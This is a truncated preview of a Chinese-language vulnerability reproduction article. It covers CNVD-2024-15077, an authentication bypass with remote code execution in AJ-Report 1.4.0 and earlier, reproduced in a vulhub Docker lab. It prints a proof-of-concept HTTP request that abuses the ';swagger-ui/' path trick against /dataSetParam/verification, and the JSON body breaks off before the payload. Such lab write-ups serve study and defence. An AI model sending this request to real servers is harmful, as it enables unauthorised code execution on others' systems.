AJ-Report（CNVD-2024-15077）漏洞复现(超详细)

文章预览

AJ-Report是全开源的一个BI平台。在其1.4.0版本及以前，存在一处认证绕过漏洞，攻击者利用该漏洞可以绕过权限校验并执行任意代码。 漏洞复现 漏洞环境 vulhub 执行如下命令启动一个AJ-Report 1.4.0服务器： docker compose up -d 服务启动后，你可以在 http://your-ip:9095 查看到登录页面。 poc POST /dataSetParam/verification;swagger-ui/ HTTP/1.1 Host: your-ip:9095 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: zh-CN,zh;q=0.9 Content-Type: application/json;charset=UTF-8 Connection: close Content-Length: 339 { "ParamName" : "" , "paramDesc" : "" , "paramType" : "" , "sampleItem" : "1" , "mandatory" : true , "requiredFl ………………………………